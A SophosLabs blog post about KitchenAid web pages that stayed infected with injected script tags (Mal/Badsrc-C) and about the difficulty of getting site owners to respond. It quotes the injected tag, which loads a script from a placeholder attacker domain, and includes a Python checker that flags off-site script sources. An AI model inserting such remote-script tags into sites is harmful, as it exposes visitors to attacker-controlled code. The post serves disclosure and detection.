Mal/Badsrc-C: Why is Kitchenaid.com still infected?

Filed Under: SophosLabs

Update: SophosLabs can confirm that the website has now been cleaned up.

In August last year, SophosLabs first noticed that a Sophos customer was blocked from visiting a page on the KitchenAid website due to a detection of Mal/Badsrc-C.

Over the last six months I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls.

When I initiate a crawl of the KitchenAid site, the crawler returns the following results:

4 instances of Mal/Badsrc-C found
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N

In the above, the X's represent letters and the N's represent numbers.

Whenever I talk to customers and people in IT and I tell them we find legitimate websites compromised by malicious code, their natural response is to say 'Do you contact them?'

To which I reply, 'We try but ...'

  • Emailing the address in the WHOIS records gets nowhere because it is either wrong, goes nowhere or messages are not read.
  • Emailing contact details on the websites suffers the same problems.
  • Phoning up to find the IT department is difficult.
  • Once you have found the IT department, finding someone who either understands or cares is time-consuming.

Some of the responses we do get back are so negative that we wonder why we bother.

The particular sites infected have multiple copies of a

<script src=http://bad-domain.com/b.js>

on the pages, and even though the site they point to is currently dead, there is no guarantee that it will stay that way.
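
A site owner can check their own pages for this pattern by listing every script loaded from a host outside an allowlist and counting the repeats. This is an added example, not SophosLabs' crawler or detection code; the sample page, the `www.example-shop.test` host and the function names are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the same off-site script tag appended several times,
# unquoted as in the post. "bad-domain.com" is the post's placeholder name.
SAMPLE_HTML = """<html><head>
<script src="/js/menu.js"></script>
<script src="http://www.example-shop.test/js/cart.js"></script>
</head><body><p>Mixers</p>
<script src=http://bad-domain.com/b.js></script>
<script src=http://bad-domain.com/b.js></script>
<script src=http://bad-domain.com/b.js></script>
</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or not."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def offsite_scripts(html, allowed_hosts):
    """Return {script URL: count} for scripts loaded from hosts not in allowed_hosts."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    counts = Counter()
    for src in collector.sources:
        host = (urlparse(src).hostname or "").lower()
        # Relative URLs have no host and load from the site itself.
        if host and host not in allowed_hosts:
            counts[src] += 1
    return dict(counts)


if __name__ == "__main__":
    findings = offsite_scripts(SAMPLE_HTML, {"www.example-shop.test"})
    for url, n in sorted(findings.items()):
        print(f"{n}x off-site script: {url}")
```

Run against saved copies of your own pages, any script host that is not on the allowlist and was not put there by your developers deserves investigation, whether or not the remote host currently responds.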

So why is the KitchenAid site still infected?

If you have any comments or answers then contact this blog via sophosblog@sophos.com.
